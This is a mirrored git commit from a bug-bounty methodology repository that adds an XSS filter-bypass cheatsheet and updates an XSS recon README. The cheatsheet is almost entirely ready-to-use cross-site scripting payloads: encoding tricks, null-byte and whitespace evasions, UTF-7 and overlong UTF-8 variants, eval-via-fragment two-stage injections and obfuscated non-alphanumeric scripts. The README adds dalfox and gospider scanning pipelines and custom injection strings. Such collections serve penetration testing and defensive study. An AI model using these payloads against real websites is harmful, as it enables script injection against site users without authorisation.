mirror of
https://github.com/xalgord/My-Methodologies.git
synced 2024-11-21 19:23:08 +00:00
GITBOOK-84: change request with no subject merged in GitBook
This commit is contained in:
parent
9160d02bf4
commit
07347df5b4
3 changed files with 227 additions and 15 deletions
|
@ -25,4 +25,5 @@
|
|||
* [🔎 How to Get Unique Subdomains on Large scope](recon-strategies-by-other-hackers/how-to-get-unique-subdomains-on-large-scope.md)
|
||||
* [🎯 subdomain-enumeration](subdomain-enumeration/README.md)
|
||||
* [❌ xss](xss/README.md)
|
||||
* [Ghetto XSS Cheatsheet](ghetto-xss-cheatsheet.md)
|
||||
* [🚀 Oneliners](oneliners.md)
|
||||
|
|
201
ghetto-xss-cheatsheet.md
Normal file
201
ghetto-xss-cheatsheet.md
Normal file
|
@ -0,0 +1,201 @@
|
|||
---
|
||||
description: 'source: https://d3adend.org/xss/ghettoBypass'
|
||||
---
|
||||
|
||||
# Ghetto XSS Cheatsheet
|
||||
|
||||
```
|
||||
_____ _ _ _ __ _______ _____ _____ _ _ _ _
|
||||
| __ \ | | | | | \ \ / / ___/ ___| / __ \ | | | | | | |
|
||||
| | \/ |__ ___| |_| |_ ___ \ V /\ `--.\ `--. | / \/ |__ ___ __ _| |_ ___| |__ ___ ___| |_
|
||||
| | __| '_ \ / _ \ __| __|/ _ \ / \ `--. \`--. \ | | | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __|
|
||||
| |_\ \ | | | __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | | __/ (_| | |_\__ \ | | | __/ __/ |_
|
||||
\____/_| |_|\___|\__|\__|\___/ \/ \|____/\____/ \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__|
|
||||
|
||||
A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.
|
||||
|
||||
Simple character manipulations.
|
||||
Note that I use hexadecimal to represent characters that you probably can't type. For example, \x00 equals a null byte, but you'll need to encode this properly depending on the context (URL encoding \x00 = %00).
|
||||
|
||||
HaRdc0r3 caS3 s3nsit1vITy bYpa55!
|
||||
<sCrIpt>alert(1)</ScRipt>
|
||||
<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
|
||||
|
||||
Null-byte character between HTML attribute name and equal sign (IE, Safari).
|
||||
<img src='1' onerror\x00=alert(0) />
|
||||
|
||||
Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
|
||||
<img src='1' onerror/=alert(0) />
|
||||
|
||||
Vertical tab between HTML attribute name and equal sign (IE, Safari).
|
||||
<img src='1' onerror\x0b=alert(0) />
|
||||
|
||||
Null-byte character between equal sign and JavaScript code (IE).
|
||||
<img src='1' onerror=\x00alert(0) />
|
||||
|
||||
Null-byte character between characters of HTML attribute names (IE).
|
||||
<img src='1' o\x00nerr\x00or=alert(0) />
|
||||
|
||||
Null-byte character before characters of HTML element names (IE).
|
||||
<\x00img src='1' onerror=alert(0) />
|
||||
|
||||
Null-byte character after characters of HTML element names (IE, Safari).
|
||||
<script\x00>alert(1)</script>
|
||||
|
||||
Null-byte character between characters of HTML element names (IE).
|
||||
<i\x00mg src='1' onerror=alert(0) />
|
||||
|
||||
Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
|
||||
<img/src='1'/onerror=alert(0)>
|
||||
|
||||
Use vertical tabs instead of whitespace (IE, Safari).
|
||||
<img\x0bsrc='1'\x0bonerror=alert(0)>
|
||||
|
||||
Use quotes instead of whitespace in some situations (Safari).
|
||||
<img src='1''onerror='alert(0)'>
|
||||
<img src='1'"onerror="alert(0)">
|
||||
|
||||
Use null-bytes instead of whitespaces in some situations (IE).
|
||||
<img src='1'\x00onerror=alert(0)>
|
||||
|
||||
Just don't use spaces (IE, Firefox, Chrome, Safari).
|
||||
<img src='1'onerror=alert(0)>
|
||||
|
||||
Prefix URI schemes.
|
||||
Firefox (\x09, \x0a, \x0d, \x20)
|
||||
Chrome (Any character \x01 to \x20)
|
||||
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
|
||||
|
||||
No greater-than characters needed (IE, Firefox, Chrome, Safari).
|
||||
<img src='1' onerror='alert(0)' <
|
||||
|
||||
Extra less-than characters (IE, Firefox, Chrome, Safari).
|
||||
<<script>alert(0)</script>
|
||||
|
||||
Backslash character between expression and opening parenthesis (IE).
|
||||
<style>body{background-color:expression\(alert(1))}</style>
|
||||
|
||||
JavaScript Escaping
|
||||
<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>
|
||||
|
||||
Encoding Galore.
|
||||
|
||||
HTML Attribute Encoding
|
||||
<img src="1" onerror="alert(1)" />
|
||||
<img src="1" onerror="alert(1)" />
|
||||
<iframe src="javascript:alert(1)"></iframe>
|
||||
<iframe src="javascript:alert(1)"></iframe>
|
||||
|
||||
URL Encoding
|
||||
<iframe src="javascript:alert(1)"></iframe>
|
||||
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
|
||||
|
||||
CSS Hexadecimal Encoding (IE specific examples)
|
||||
<div style="x:expression(alert(1))">Joker</div>
|
||||
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
|
||||
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
|
||||
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
|
||||
|
||||
JavaScript (hexadecimal, octal, and unicode)
|
||||
<script>document.write('<img src=1 onerror=alert(1)>');</script>
|
||||
<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
|
||||
<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
|
||||
<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>
|
||||
|
||||
JavaScript (Decimal char codes)
|
||||
<script>document.write('<img src=1 onerror=alert(1)>');</script>
|
||||
<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
|
||||
|
||||
JavaScript (Unicode function and variable names)
|
||||
<script>alert(123)</script>
|
||||
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
|
||||
|
||||
Overlong UTF-8 (SiteMinder is awesome!)
|
||||
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
|
||||
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
|
||||
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
|
||||
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
|
||||
|
||||
<img src="1" onnerror="alert(1)">
|
||||
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
|
||||
|
||||
UTF-7 (Missing charset?)
|
||||
<img src="1" onerror="alert(1)" />
|
||||
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
|
||||
|
||||
Unicode .NET Ugliness
|
||||
<script>alert(1)</script>
|
||||
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
|
||||
|
||||
Classic ASP performs some unicode homoglyphic translations... don't ask why...
|
||||
<img src="1" onerror="alert('1')">
|
||||
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
|
||||
|
||||
Useless and/or Useful features.
|
||||
|
||||
HTML 5 (Not comphrensive)
|
||||
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
|
||||
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
|
||||
|
||||
Usuage of non-existent elements (IE)
|
||||
<blah style="blah:expression(alert(1))" />
|
||||
|
||||
CSS Comments (IE)
|
||||
<div style="z:exp/*anything*/res/*here*/sion(alert(1))" />
|
||||
|
||||
Alternate ways of executing JavaScript functions
|
||||
<script>window['alert'](0)</script>
|
||||
<script>parent['alert'](1)</script>
|
||||
<script>self['alert'](2)</script>
|
||||
<script>top['alert'](3)</script>
|
||||
|
||||
Split up JavaScript into HTML attributes
|
||||
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
|
||||
|
||||
HTML is parsed before JavaScript
|
||||
<script>
|
||||
var junk = '</script><script>alert(1)</script>';
|
||||
</script>
|
||||
|
||||
HTML is parsed before CSS
|
||||
<style>
|
||||
body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
|
||||
</style>
|
||||
|
||||
XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
|
||||
<?xml version="1.0" ?>
|
||||
<someElement>
|
||||
<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
|
||||
</someElement>
|
||||
|
||||
URI Schemes
|
||||
<iframe src="javascript:alert(1)"></iframe>
|
||||
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
|
||||
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
|
||||
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
|
||||
|
||||
HTTP Parameter Pollution
|
||||
http://target.com/something.xxx?a=val1&a=val2
|
||||
ASP.NET a = val1,val2
|
||||
ASP a = val1,val2
|
||||
JSP a = val1
|
||||
PHP a = val2
|
||||
|
||||
Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
|
||||
<script>eval(location.hash.slice(1))</script>
|
||||
<script>eval(location.hash)</script> (Firefox)
|
||||
|
||||
http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
|
||||
|
||||
Two Stage XSS via name attribute
|
||||
<iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>
|
||||
|
||||
Non-alphanumeric crazyness...
|
||||
<script>
|
||||
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
|
||||
</script>
|
||||
|
||||
<script>
|
||||
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
|
||||
</script>
|
||||
```
|
|
@ -1,4 +1,6 @@
|
|||
## Get Parameter as much as possible
|
||||
# ❌ xss
|
||||
|
||||
### Get Parameter as much as possible
|
||||
|
||||
1. https://github.com/devanshbatham/ParamSpider
|
||||
2. gospider -S tageturls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'|grep "=" | qsreplace -a | dalfox pipe -o result.txt
|
||||
|
@ -9,38 +11,46 @@
|
|||
|
||||
Combine all in a file and remove duplicates.
|
||||
|
||||
## Run XSS fuzzer
|
||||
### Run XSS fuzzer
|
||||
|
||||
1. https://github.com/s0md3v/XSStrike
|
||||
2. https://github.com/hahwul/dalfox
|
||||
|
||||
|
||||
Resources:
|
||||
- https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start/
|
||||
- https://infosecwriteups.com/tale-of-my-first-xss-27f622bc47c0
|
||||
<hr>
|
||||
|
||||
## dalfox usage:
|
||||
* https://blog.yeswehack.com/yeswerhackers/parameter-discovery-quick-guide-to-start/
|
||||
* https://infosecwriteups.com/tale-of-my-first-xss-27f622bc47c0
|
||||
|
||||
***
|
||||
|
||||
### dalfox usage:
|
||||
|
||||
```
|
||||
gf xss domain.txt | grep -Eo 'https?://[^\"]+' > domain.txt
|
||||
dalfox file domain.txt -w 20 --silence
|
||||
```
|
||||
|
||||
<hr>
|
||||
***
|
||||
|
||||
## another technique to find XSS
|
||||
### another technique to find XSS
|
||||
|
||||
- Scrape all urls from the domain using gau
|
||||
- then sort the result using grep command: `cat url.txt | grep “utm_”`
|
||||
- do testing
|
||||
* Scrape all urls from the domain using gau
|
||||
* then sort the result using grep command: `cat url.txt | grep “utm_”`
|
||||
* do testing
|
||||
|
||||
resources:
|
||||
- https://santoshdbobade.medium.com/how-i-got-reflected-cross-site-scripting-rxss-on-manchester-metropolitan-university-700b36cb4f53
|
||||
|
||||
* https://santoshdbobade.medium.com/how-i-got-reflected-cross-site-scripting-rxss-on-manchester-metropolitan-university-700b36cb4f53
|
||||
|
||||
<hr>
|
||||
***
|
||||
|
||||
### Custom useful XSS Attack Vectors
|
||||
|
||||
## Custom useful XSS Attack Vectors
|
||||
```
|
||||
testing"><img/src=x onerror=alert(/XSS/)//
|
||||
testing'-alert(2)-'xss
|
||||
```
|
||||
|
||||
Encoding Bypass:
|
||||
|
||||
[https://d3adend.org/xss/ghettoBypass](https://d3adend.org/xss/ghettoBypass)
|
||||
|
|
Loading…
Reference in a new issue